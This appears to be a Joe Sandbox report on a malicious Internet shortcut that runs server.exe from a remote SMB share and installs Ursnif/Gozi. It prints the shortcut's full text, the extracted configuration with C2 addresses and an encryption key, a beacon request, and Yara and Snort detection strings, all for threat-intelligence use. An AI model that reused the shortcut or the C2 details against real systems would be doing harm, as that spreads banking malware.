Edit tour

Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name:	marzo.txt.url
Analysis ID:	826967
MD5:	d8dc17b22192b297073d5749a7b49966
SHA1:	606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256:	f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
Infos:

Detection

Ursnif

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

Snort IDS alert for network traffic

Writes or reads registry keys via WMI

Found malicious URL file

Writes registry values via WMI

Opens network shares

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Creates a window with clipboard capturing capabilities

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 6104 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)

server.exe (PID: 6612 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)

server.exe (PID: 6832 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Gozi, Ursnif	2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.	No Attribution	http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/ https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007 https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
marzo.txt.url	Methodology_Suspicious_Shortcut_SMB_URL	Detects remote SMB path for .URL persistence	@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)	0x35:$file: URL=file://4 0x8a:$url_clsid: [{000214A0-0000-0000-C000-000000000046}] 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x644d:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6aa5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1238:$a1: /C ping localhost -n %u && del "%s" 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xaac:$a5: filename="%.4u.%lu" 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe7d:$a9: &whoami=%s 0xe66:$a10: %u.%u_%u_%u_x%u 0xd73:$a11: size=%u&hash=0x%08x 0xb2d:$a12: &uptime=%u 0x70b:$a13: %systemroot%\system32\c_1252.nls 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xda6:$a9: Software\AppDataLow\Software\Microsoft\ 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: server.exe PID: 6612	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 6612	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x3def:$a5: filename="%.4u.%lu" 0x3fa5:$a5: filename="%.4u.%lu" 0x78a9:$a5: filename="%.4u.%lu" 0x7a5f:$a5: filename="%.4u.%lu" 0x39a2:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x745c:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3b16:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3eef:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x40a7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5d81:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5e62:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x6005:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x75d0:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x79a9:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7b61:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x4307:$a9: &whoami=%s 0x7dc1:$a9: &whoami=%s 0x42f0:$a10: %u.%u_%u_%u_x%u 0x7daa:$a10: %u.%u_%u_%u_x%u 0x4210:$a11: size=%u&hash=0x%08x 0x7cca:$a11: size=%u&hash=0x%08x
Process Memory Space: server.exe PID: 6612	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x3e96:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x404e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x7950:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x7b08:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x39a2:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x39ff:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x745c:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x74b9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3dbb:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x3f71:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x7875:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x7a2b:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x41a1:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x447a:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x7c5b:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x7f34:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x4243:$a9: Software\AppDataLow\Software\Microsoft\ 0x4517:$a9: Software\AppDataLow\Software\Microsoft\ 0x4ed0:$a9: Software\AppDataLow\Software\Microsoft\ 0x7cfd:$a9: Software\AppDataLow\Software\Microsoft\ 0x7fd1:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: server.exe PID: 6832	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: server.exe PID: 6832	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x1e45:$a5: filename="%.4u.%lu" 0x1ffb:$a5: filename="%.4u.%lu" 0x19f8:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1b6c:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1f45:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x20fd:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa974:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xaa55:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xabf8:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x235d:$a9: &whoami=%s 0x2346:$a10: %u.%u_%u_%u_x%u 0x2266:$a11: size=%u&hash=0x%08x 0x1eb8:$a12: &uptime=%u 0x2072:$a12: &uptime=%u 0x1ab5:$a13: %systemroot%\system32\c_1252.nls 0x2416:$a14: IE10RunOnceLastShown_TIMESTAMP
Process Memory Space: server.exe PID: 6832	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x1eec:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x20a4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x19f8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1a55:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1e11:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1fc7:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x21f7:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x24d0:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x2299:$a9: Software\AppDataLow\Software\Microsoft\ 0x256d:$a9: Software\AppDataLow\Software\Microsoft\ 0x306e:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 13 entries

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.3 - Destination IP: 5.44.43.17

Timestamp:	192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785
SID:	2033203
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.3 - Destination IP: 5.44.43.17

Timestamp:	192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785
SID:	2033204
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		5_2_02BE1508

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80

Source: Joe Sandbox View

ASN Name: MGNHOST-ASRU MGNHOST-ASRU

Source: Joe Sandbox View

IP Address: 192.229.221.95 192.229.221.95

Source: global traffic

HTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.44.43.17/~
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr

Source: unknown

DNS traffic detected: queries for: checklist.skype.com

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR

Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		5_2_02BE1508

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Found malicious URL file

Source: marzo.txt.url

Initial sample: [InternetShortcut]IconIndex=70HotKey=0IDList=URL=file://46.8.19.120/Agenzia/server.exeIconFile=C:\Windows\system32\SHELL32.dll[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9

Writes registry values via WMI

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: marzo.txt.url, type: SAMPLE	Matched rule: Methodology_Suspicious_Shortcut_SMB_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects remote SMB path for .URL persistence, score = 27.09.2019, sample = e0bef7497fcb284edb0c65b59d511830, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
